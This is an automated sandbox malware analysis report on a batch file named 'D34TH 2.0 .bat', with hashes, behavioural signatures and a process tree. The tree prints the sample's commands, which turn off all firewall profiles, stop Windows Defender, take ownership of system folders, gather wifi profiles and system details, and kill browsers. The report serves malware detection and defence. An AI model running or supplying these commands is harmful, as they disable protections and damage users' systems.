Analysis

  • max time kernel
    141s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-04-2024 10:23

General

  • Target

    D34TH 2.0 .bat

  • Size

    1KB

  • MD5

    8ee9033a02ee6fc3b932b694c1bc631c

  • SHA1

    6d64ea5dadd6d5098342213a1cf354896b8a3963

  • SHA256

    1609a6c649ea074815ce85da21935137e9c79c79a41088a6f7e99a56bd20340d

  • SHA512

    f1735b2a7f4b384cf3a82f17e2834912f04d554350d6a03dd1ff6b55efb161e900ae14bd1c337f40d4692d390a726219c85d3a8df6164bac73e2f5c3d38d6a91

Score
8/10

Malware Config

Signatures

  • Drops file in Drivers directory 64 IoCs
  • Manipulates Digital Signatures 4 IoCs

    Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.

  • Modifies Windows Firewall 2 TTPs 7 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 5 IoCs
  • Unexpected DNS network traffic destination 3 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Drops file in System32 directory 64 IoCs
  • Modifies termsrv.dll 1 TTPs 1 IoCs

    Commonly used to allow simultaneous RDP sessions.

  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 3 IoCs
  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\D34TH 2.0 .bat"
    1⤵
    • Drops file in Drivers directory
    • Manipulates Digital Signatures
    • Checks computer location settings
    • Drops file in System32 directory
    • Modifies termsrv.dll
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:5076
    • C:\Windows\system32\nslookup.exe
      nslookup myip.opendns.com resolver1.opendns.com
      2⤵
        PID:1716
      • C:\Windows\system32\netsh.exe
        netsh wlan show profiles
        2⤵
          PID:1448
        • C:\Windows\system32\ipconfig.exe
          ipconfig
          2⤵
          • Gathers network information
          PID:1896
        • C:\Windows\system32\ipconfig.exe
          ipconfig
          2⤵
          • Gathers network information
          PID:3556
        • C:\Windows\system32\find.exe
          find /i "IPv4"
          2⤵
            PID:3648
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic diskdrive get size
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3676
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic cpu get name
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3652
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            2⤵
            • Gathers system information
            PID:4000
          • C:\Windows\system32\netsh.exe
            netsh firewall set opmode disable
            2⤵
            • Modifies Windows Firewall
            PID:3460
          • C:\Windows\system32\netsh.exe
            netsh firewall set opmode mode=DISABLE
            2⤵
            • Modifies Windows Firewall
            PID:1656
          • C:\Windows\system32\netsh.exe
            netsh advfirewall set currentprofile state off
            2⤵
            • Modifies Windows Firewall
            PID:1520
          • C:\Windows\system32\netsh.exe
            netsh advfirewall set domainprofile state off
            2⤵
            • Modifies Windows Firewall
            PID:2200
          • C:\Windows\system32\netsh.exe
            netsh advfirewall set privateprofile state off
            2⤵
            • Modifies Windows Firewall
            PID:3996
          • C:\Windows\system32\netsh.exe
            netsh advfirewall set publicprofile state off
            2⤵
            • Modifies Windows Firewall
            PID:228
          • C:\Windows\system32\netsh.exe
            netsh advfirewall set allprofiles state off
            2⤵
            • Modifies Windows Firewall
            PID:2196
          • C:\Windows\system32\NOTEPAD.EXE
            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\F.log
            2⤵
            • Opens file in notepad (likely ransom note)
            PID:112
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32
            2⤵
            • Modifies file permissions
            PID:4656
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System
            2⤵
            • Modifies file permissions
            PID:4628
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\Boot
            2⤵
            • Modifies file permissions
            PID:4928
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\Fonts
            2⤵
            • Modifies file permissions
            PID:2036
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\sysWOW64
            2⤵
            • Modifies file permissions
            PID:904
          • C:\Windows\system32\net.exe
            net stop "Windows Defender Service"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2772
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop "Windows Defender Service"
              3⤵
                PID:3236
            • C:\Windows\system32\net.exe
              net stop "Windows Firewall"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4004
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop "Windows Firewall"
                3⤵
                  PID:3364
              • C:\Windows\system32\taskkill.exe
                taskkill /F /IM "chrome.exe" /T
                2⤵
                • Kills process with taskkill
                PID:4180
              • C:\Windows\system32\taskkill.exe
                taskkill /F /IM "firefox.exe" /T
                2⤵
                • Kills process with taskkill
                PID:3732
              • C:\Windows\system32\taskkill.exe
                taskkill /F /IM "explorer.exe" /T
                2⤵
                • Kills process with taskkill
                PID:5108

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\F.log

              Filesize

              2KB

              MD5

              623e4897f089c630adc40fc18f03dc7b

              SHA1

              67db75e14e2d70ef328ea44992b4d542bcc2e580

              SHA256

              a67c49ce28100ba8c87d4b83ec5c037455cb8a296862f43c3aa4258b93465a53

              SHA512

              55356b102e57ade6ee0fcb25f57e5eb5ee11a0f8b5f2e6a7c5ae70daeadd72a22c37d6c965aeb7c86881831c708e923d9558a08c33f055f1be5ed2d31e7b05a8